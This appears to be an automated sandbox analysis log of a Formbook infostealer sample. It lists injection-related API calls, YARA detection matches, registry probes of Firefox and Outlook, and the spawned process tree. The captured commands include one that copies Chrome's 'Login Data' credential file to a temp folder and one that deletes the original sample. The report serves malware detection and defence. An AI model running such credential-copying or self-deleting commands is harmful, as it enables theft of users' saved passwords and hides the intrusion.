          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A4A0 NtUnmapViewOfSection,6_2_0480A4A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480B410 NtOpenProcessToken,6_2_0480B410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A430 NtQueryVirtualMemory,6_2_0480A430
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A460 NtOpenProcess,6_2_0480A460
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480B470 NtOpenThread,6_2_0480B470
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A5A0 NtWriteVirtualMemory,6_2_0480A5A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A5F0 NtReadVirtualMemory,6_2_0480A5F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A520 NtEnumerateKey,6_2_0480A520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480BD40 NtSuspendThread,6_2_0480BD40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A6D0 NtCreateProcessEx,6_2_0480A6D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A650 NtQueueApcThread,6_2_0480A650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A780 NtOpenDirectoryObject,6_2_0480A780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A700 NtProtectVirtualMemory,6_2_0480A700
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A710 NtQuerySection,6_2_0480A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A720 NtResumeThread,6_2_0480A720
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480B0B0 NtGetContextThread,6_2_0480B0B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A2F0 NtQueryInformationFile,6_2_0480A2F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A220 NtWaitForSingleObject,6_2_0480A220
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480BA30 NtSetContextThread,6_2_0480BA30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A370 NtQueryInformationProcess,6_2_0480A370
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB9A30 NtAllocateVirtualMemory,6_2_02DB9A30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB9850 NtCreateFile,6_2_02DB9850
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB9980 NtClose,6_2_02DB9980
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB9900 NtReadFile,6_2_02DB9900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB9A2C NtAllocateVirtualMemory,6_2_02DB9A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB98FA NtReadFile,6_2_02DB98FA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB997A NtClose,6_2_02DB997A
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00419850 NtCreateFile,18_2_00419850
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00419900 NtReadFile,18_2_00419900
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00419980 NtClose,18_2_00419980
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00419A30 NtAllocateVirtualMemory,18_2_00419A30
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_004198FA NtReadFile,18_2_004198FA
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041997A NtClose,18_2_0041997A
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00419A2C NtAllocateVirtualMemory,18_2_00419A2C
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 0_2_0126E4480_2_0126E448
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 0_2_0126E4580_2_0126E458
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 0_2_0126B7FC0_2_0126B7FC
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 0_2_05374D3C0_2_05374D3C
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041C88F2_2_0041C88F
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041CA572_2_0041CA57
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041DA162_2_0041DA16
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041B5F62_2_0041B5F6
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00409F802_2_00409F80
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F547E6_2_047F547E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04892C9A6_2_04892C9A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04891C9F6_2_04891C9F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048834906_2_04883490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488DCC56_2_0488DCC5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048844EF6_2_048844EF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E14106_2_047E1410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047D740C6_2_047D740C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0487F42B6_2_0487F42B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488E5816_2_0488E581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0486E58A6_2_0486E58A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047C0D406_2_047C0D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E15306_2_047E1530
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488D5D26_2_0488D5D2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0487FDDB6_2_0487FDDB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04871DE36_2_04871DE3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048925196_2_04892519
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04881D1B6_2_04881D1B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0486C53F6_2_0486C53F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F5E706_2_047F5E70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04883E966_2_04883E96
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F4E616_2_047F4E61
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E76406_2_047E7640
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F66116_2_047F6611
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048926F86_2_048926F8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488CE666_2_0488CE66
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048827826_2_04882782
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04891FCE6_2_04891FCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047C67D06_2_047C67D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048917466_2_04891746
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E57906_2_047E5790
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F10706_2_047F1070
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048718B66_2_048718B6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F00216_2_047F0021
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047FE0206_2_047FE020
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048928E86_2_048928E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F98106_2_047F9810
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0488D0166_2_0488D016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F48CB6_2_047F48CB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047DA0806_2_047DA080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F594B6_2_047F594B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0489D9BE6_2_0489D9BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048861DF6_2_048861DF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048919E26_2_048919E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F71106_2_047F7110
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048199066_2_04819906
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F61806_2_047F6180
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04891A996_2_04891A99
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F4A5B6_2_047F4A5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F523D6_2_047F523D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_048922DD6_2_048922DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04880A026_2_04880A02
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0489E2146_2_0489E214
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047E42B06_2_047E42B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047EFB406_2_047EFB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047CEBE06_2_047CEBE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F63C26_2_047F63C2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_047F4B966_2_047F4B96
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBCA576_2_02DBCA57
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBDA166_2_02DBDA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBC88F6_2_02DBC88F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA9F806_2_02DA9F80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA2FB06_2_02DA2FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBB5F66_2_02DBB5F6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA2D906_2_02DA2D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA2D876_2_02DA2D87
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0040103018_2_00401030
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041C88F18_2_0041C88F
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041CA5718_2_0041CA57
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041DA1618_2_0041DA16
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041B5F618_2_0041B5F6
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00402D8718_2_00402D87
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00402D9018_2_00402D90
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00409F8018_2_00409F80
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00402FB018_2_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 047CB0E0 appears 176 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04855110 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0481DDE8 appears 48 times
          Source: ewuTygg1Bw.exeBinary or memory string: OriginalFilename vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000000.00000002.435274677.0000000002D50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameServiceHost.dll8 vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000000.00000000.412675691.0000000000A94000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelhsaRpNgbejzP.exeF vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exeBinary or memory string: OriginalFilename vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000002.00000002.479921865.0000000003590000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000002.00000002.479376784.0000000001C2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exe, 00000002.00000002.476548664.0000000000F74000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelhsaRpNgbejzP.exeF vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exeBinary or memory string: OriginalFilenameServiceHost.dll8 vs ewuTygg1Bw.exe
          Source: ewuTygg1Bw.exeBinary or memory string: OriginalFilenamelhsaRpNgbejzP.exeF vs ewuTygg1Bw.exe
          Source: C:\Windows\SysWOW64\cscript.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: ewuTygg1Bw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vgaot707b.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/10@3/1
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ewuTygg1Bw.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\IobkJump to behavior
          Source: ewuTygg1Bw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: ewuTygg1Bw.exeVirustotal: Detection: 36%
          Source: unknownProcess created: C:\Users\user\Desktop\ewuTygg1Bw.exe 'C:\Users\user\Desktop\ewuTygg1Bw.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\ewuTygg1Bw.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ewuTygg1Bw.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknownProcess created: C:\Program Files (x86)\Iobk\vgaot707b.exe C:\Program Files (x86)\Iobk\vgaot707b.exe
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Iobk\vgaot707b.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess created: C:\Users\user\Desktop\ewuTygg1Bw.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Iobk\vgaot707b.exe C:\Program Files (x86)\Iobk\vgaot707b.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ewuTygg1Bw.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeProcess created: C:\Program Files (x86)\Iobk\vgaot707b.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile written: C:\Users\user\AppData\Roaming\983-T328\983logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: ewuTygg1Bw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ewuTygg1Bw.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: ewuTygg1Bw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cscript.pdbUGP source: ewuTygg1Bw.exe, 00000002.00000002.479921865.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.862871028.0000000005FE0000.00000002.00000001.sdmp
          Source: Binary string: ServiceHost.pdb source: vgaot707b.exe, ewuTygg1Bw.exe
          Source: Binary string: wntdll.pdbUGP source: ewuTygg1Bw.exe, 00000002.00000002.478030527.0000000001980000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.841185505.00000000048BF000.00000040.00000001.sdmp, vgaot707b.exe, 00000012.00000002.836063194.00000000011D0000.00000040.00000001.sdmp
